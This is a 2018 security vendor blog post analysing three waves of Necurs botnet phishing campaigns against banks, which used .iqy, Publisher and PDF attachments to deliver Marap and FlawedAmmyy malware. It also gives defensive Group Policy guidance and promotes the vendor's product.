Barkly vs Malware
Barkly Research
Aug 2018

Necurs Botnet Takes Aim at Banks with Targeted, Iterative Campaigns

necurs-bank-campaign

Photo by Expect Best

More than 3,000 banks worldwide have been hit with a variety of experimental malware delivery techniques over the course of two weeks.

After staying relatively quiet for the large part of the year, Necurs, the world's largest spam botnet, has sprung back to life this summer. Most recently, researchers from Proofpoint and Cofense have independently observed the botnet launching large waves of malicious emails primarily targeting banks and other financial institutions. 

What's particularly interesting about these campaigns is that they appear to be employing a "fail fast" approach, with each wave experimenting with a variety of email lures and attachment types in an apparent attempt to see what sticks. In this post, we'll take a closer look at these various tactics in more detail, and provide tips for how organizations can protect themselves from each one. 

necurs-bank-campaigns-august-2018

1st wave: August 10 — Experimenting with .iqy files

  • Attachment types: 
    • Microsoft Excel Web Query (.iqy) files
    • PDFs with embedded .iqy files
    • Password-protected ZIP archives containing .iqy files
    • Microsoft Word documents containing macros

  • Payload:
    • Marap (downloader)

Researchers at Proofpoint first observed Necurs launching large campaigns consisting of millions of malspam emails directed primarily at financial institutions on August 10. These campaigns utilized a total of four different attachment types, including not one, not two, but three different ways of leveraging Microsoft Excel Web Query (.iqy) files.

What makes .iqy files (essentially simple text files that open by default in Excel) dangerous is they can be used to download and run malicious commands directly from the Internet. Excel expert Jon Wittwer describes them as "basically like having a web browser built into Excel."

necurs-iqy-file-contents

Contents of one of the .iqy files used in the August 10 campaigns. 


The use of .iqy files in attack campaigns is similar to the use of malicious macros embedded inside 
Microsoft Word documents. When an .iqy file is opened it launches Excel, which issues a warning prompt asking the user to choose whether or not they want to enable data connections. If enabled, the .iqy file will pull any data (typically a PowerShell script) from the URL included in its code. 

necurs-iqy-file-warning-prompt

Example of the user prompt issued when a .iqy file is opened. 

Thankfully, in order for Excel to run any malicious code or script downloaded from the URL, the user has to respond to another prompt, as well. Unfortunately, similar prompts haven't stopped users from enabling macros in suspicious documents, and there's little reason to expect it will be a 100% effective deterrent here, either.

iqy-user-warning-prompt-2

Example of the second user prompt issued before executing any commands or scripts the .iqy file grabs. 


Necurs campaigns have been using .iqy files since late May, when security researcher @dvk01uk first spotted them being used to deploy FlawedAmmyy, a remote access trojan (RAT) developed from the leaked source code of the legitimate Ammyy Admin remote desktop software. 

In contrast, the August 10 campaigns tracked by Proofpoint were attempting to deploy Marap, a new malware downloader designed to hide out on infected machines with the goal of identifying systems of interest and launching future attacks. 

They also utilized at least four different email themes and attachment types:

Campaign variant #1: Fake sales request

  • Subject: REQUEST [REF:ABCDEXYZ]
  • From: sales <random@randomdomain.com >
  • Body: "Please find the attached file."
  • Attachment: REP_[date].iqy

marap-necurs-email-1

Source: Proofpoint 


Campaign variant #2: "IMPORTANT Documents" message from major bank

  • Subject: IMPORTANT Documents - [name of major bank]
  • From: [recipient name] <random_name@[major bank].com >
  • Body: "Please check attached documents."
  • Attachment: [majorbank]_request_1008.iqy

marap-necurs-email-2

Details identifying which major bank was being spoofed obscured by Proofpoint. Source: Proofpoint 


Campaign variant #3: PDF attachments

  • Subject: SCN/DOC/PDF/PDFFILE_[random digits]_[campaign date]
  • From: [random name] <netadmin@[random domain]>
  • Body: "Please check attached documents."
  • Attachment: SCN/DOC/PDF/PDFFILE_[random digits]_[campaign date].pdf

marap-necurs-pdf-email

This email is very similar to others used in previous Necurs campaigns utilizing .iqy files. Source: Proofpoint 

 

Campaign variant #4: Password-protected ZIP attachments

  • Subject: Emailing: PIC[random digits]
  • From: [random name] <[random name]@[random domain].com>
  • Body: "The message is ready to be sent with the following file or link attachments: [file] [password]"
  • Attachment: PIC[random digits].zip (contains .iqy file)

marap-necurs-password-protected-zip-file

Source: Proofpoint 

 

Campaign variant #5: Fake Word document invoices

  • Subject: Invoice for [random digits].[date]
  • From: [random name] <[random name]@[random domain].com>
  • Body: "This email confirms that your goods have been dispatched. Please find attached your Invoice in PDF format. Please note this document will onlyl be sent in electronic form."
  • Attachment: Invoice_[random digits]_[date].doc

marap-necurs-word-doc-invoice-email

Email incorrectly says the attachment is a PDF when in fact it's a Word document. Source: Proofpoint 

2nd wave: August 15 — Shift to Microsoft Publisher files

  • Attachment types:
    • Microsoft Publisher (.pub) files
    • PDFs with embedded .iqy files

  • Payload: FlawedAmmyy (RAT)

Less than a week following Proofpoint's Necurs sighting, researchers at Cofense sounded the alarm on a new wave of emails targeting more than 3,700 bank domains. This time, the emails largely abandoned the use of .iqy files in favor of attaching Microsoft Publisher files with malicious macros embedded inside (though a small subset did continue using PDFs with embedded .iqy files). 

Microsoft Publisher isn't nearly as ubiquitous as Word or Excel, but its support of macros makes it just as useful from an attacker's perspective. Once enabled, the .pub file macros are designed to download the FlawedAmmyy payload from a URL and execute it without launching cmd.exe or PowerShell. 

necurs-pub-file-macro

Macro embedded inside Microsoft Publisher file. Source: Cofense 

 

Campaign example:

  • Subject: Payment Advice [random characters]
  • From: [random name]@[randomdomain].com
  • Body: "Please find the attached Payment advice for your claim number [matches random characters from the subject line]."
  • Attachment: Payment_Advice_[random characters].pub 

Necurs-pub-file-email-1

Source: Cofense 

3rd wave: August 21 — More experimentation with .pub files

  • Attachment types:
    • PDFs with embedded Microsoft Publisher (.pub) files

  • Payload: FlawedAmmyy (RAT)

Six days following their first sighting, Cofense announced they were witnessing another Necurs campaign targeting banks. This time, the emails were disguised as payment notifications being sent from the South African Capitec Bank. And rather than including Microsoft Publisher attachments, the emails included PDF files with .pub files embedded inside. 

Opening the PDFs triggers JavaScript that attempts to automatically open the .pub file, and once opened, users are prompted to enable macros. From there, the infection is carried out via the same steps as in the previous campaign, with the macro ultimately downloading and executing the FlawedAmmyy payload. 

Campaign example:

  • Subject: Payment Notification
  • From: [random name]@capitecbank.co.za
  • Body: Blank with Capitec Bank footer
  • Attachment: payment_notification.pdf 

necurs-pdf-pub-file-email

Source: Cofense 

Two accelerating attack trends putting organizations on the defensive

These latest campaigns from Necurs reflect two broad, dangerous trends:

  1. The widespread abuse of legitimate file types
    The use of .iqy and .pub files in these campaigns is yet another example of attackers latching onto legitimate file formats in order to slip past filters and carry out attacks using built-in Windows features and functionality. Prior to these campaigns, Necurs was also responsible for distributing emails carrying PDFs with .SettingContent-ms files inside. More on how .SettingContent-ms files have been abused here. 

  2. The use of rapid iteration to fine-tune attacks and stay one step ahead of security
    This sudden burst of activity from Necurs is concerning in its own right, but it also highlights how quickly attackers are adopting and experimenting with new attack tactics. Necurs serves as the perfect testbed for that activity, making it easy for attackers to launch experimental campaigns on large groups of unwilling test subjects. The faster they can sort out what works and what doesn't, the quicker they can refine their techniques, and the more dangerous their attacks become. 

Security is already a cat-and-mouse game operating at breakneck speed. The ability of attackers to rapidly iterate means companies need to be ready for new types of attacks arriving at an even faster pace.

Find out how Barkly can help with machine learning models that are trained nightly and that protection that evolves alongside attacks.

How to block attempts to abuse .iqy files

Abuse of .iqy files has been gradually gaining wider adoption since late May. Because they're a legitimate (and extremely simple) file format, email and antivirus filters don't stand much chance of blocking them on their own. To protect your organization, here's what you should do:

  • Adjust firewall / email filtering settings to block .iqy files
  • If your organization doesn't require active use of .iqy files, consider forcing them to open via NotePad:
    1. Open the Group Policy Management Console 
    2. Create a new Group Policy and name it something like "Block IQY Execution"
    3. Apply the policy to the appropriate OUs and security groups, or apply to the entire domain. Next, right-click on the policy and click Edit
    4. Navigate to User Configuration/Preferences/Control Panel Settings/Folder Options
    5. Right-click in the blank area and click on Open With
    6. In the box that pops up, choose Update for the Action, enter iqy for the file extension, make sure Set as default is checked, then lastly for the Associated Program field type in %windir%\System32\notepad.exe

Barkly customers: You're protected. Barkly blocks attempts to abuse .iqy files.

Blocking-IQY-attack

How to block attacks using macros in Microsoft Publisher files

For organizations that have taken steps to lock down Word or Excel but have neglected other Office programs like Publisher, here's another quick item for the to-do list. 

The good news is Microsoft ramped up its protections around macros in Office 2016, providing admins with more granular controls via Group Policy settings. You can read a full breakdown of those setting options along with helpful guidelines here. At a high level, Microsoft recommends the following settings:

Microsoft-Group-Policy-Settings-Macros 

Click to expand 
Note: Here's the link to information about setting up trusted locations for files in Office 2016


Barkly customers: You're protected. Barkly blocks attempts to abuse macros in Office programs including Publisher.

Barkly-blocks-malicious-Microsoft-Publisher-macro

By blocking malicious behavior patterns (in addition to malicious files), Barkly is able to provide more comprehensive protection that isn't reliant on the flawed AV approach. No more "patient zero" victims getting infected and protection being updated with new signatures after-the-fact. Just solid protection from malware and the underlying deployment techniques attackers rely on, which means Barkly blocks even new attack campaigns from day one. 

Want to see Barkly in action for yourself? Sign up to test it out.  

Want to stay up-to-date on the latest threats? Subscribe to the Barkly blog.

Barkly Research

Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.

lock-white.png

Don't be the last to know about new attacks

Join a group of 7,000 IT and security pros who get clear, actionable takes on the latest malware and infosec news.

Subscribe

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.